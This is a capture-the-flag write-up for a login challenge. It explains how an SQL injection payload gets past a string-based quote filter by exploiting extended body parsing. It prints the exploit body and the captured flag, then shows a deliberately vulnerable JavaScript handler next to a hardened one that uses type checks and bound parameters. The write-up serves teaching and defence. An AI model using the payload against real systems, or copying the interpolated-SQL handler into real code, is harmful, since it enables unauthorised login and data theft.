Tags: sqli
Rating:
1. Note the template string with injection from request body.
2. Note the bodyParser library uses the `extended` option, parsing arbitrary JSON objects.
3. Send a POST where the request body is some SQL injection and also overrides the `includes` field:
- `username=admin&password=' or true --&password[includes]=undefined`
4. Get the flag: `dice{sq1i_d03sn7_3v3n_3x1s7_4nym0r3}`
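The two notes above explain the whole bug: the handler screens `password` with a string method, but once the extended body parser can turn `password` into a non-string, the screen never sees the quote. The following is an added example written for this writeup, not the challenge's source. It hard-codes what the `password=' or true --&password[includes]=undefined` body is understood to parse into under qs-style extended parsing (an assumption about qs's merge behaviour; check it against the version you run), shows the filter passing and the template string producing the injected query, and then shows the hardened handler: type-check every field and bind user data as parameters instead of interpolating it. No database is involved; the queries are returned as data.

```javascript
// Added example, not the challenge's own code.

// Constructed: the assumed result of extended (qs-style) parsing of
//   username=admin&password=' or true --&password[includes]=undefined
// The plain value and the bracketed key get merged into an array.
const parsedBody = {
  username: 'admin',
  password: ["' or true --", { includes: 'undefined' }],
};

// Vulnerable: the check relies on String.prototype.includes, but an array
// also has an `includes` method, so the call succeeds and simply returns
// false (no element strictly equals a single quote).
function vulnerableHandler(body) {
  const { username, password } = body;
  if (password.includes("'")) {
    return { rejected: true, reason: 'quote in password' };
  }
  // Interpolation coerces the array to "' or true --,[object Object]",
  // and the quote it carries lands inside the SQL string.
  const sql = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;
  return { rejected: false, sql };
}

// Hardened: reject anything that is not a string before touching it, and
// never build SQL by interpolation; hand the values to the driver as bound
// parameters so quoting is the driver's job, not a blacklist's.
function hardenedHandler(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return { rejected: true, reason: 'fields must be strings' };
  }
  return {
    rejected: false,
    sql: 'SELECT * FROM users WHERE username = ? AND password = ?',
    params: [username, password],
  };
}

// Stand-alone demonstration.
console.log(vulnerableHandler(parsedBody));
console.log(hardenedHandler(parsedBody));
console.log(hardenedHandler({ username: 'admin', password: 'hunter2' }));
```

The `?` placeholder is the style used by `mysql`/`mysql2`; `pg` uses `$1`, `$2`. The lesson is the same in either driver: the type check closes the parser trick, and parameter binding removes the need for the quote blacklist entirely.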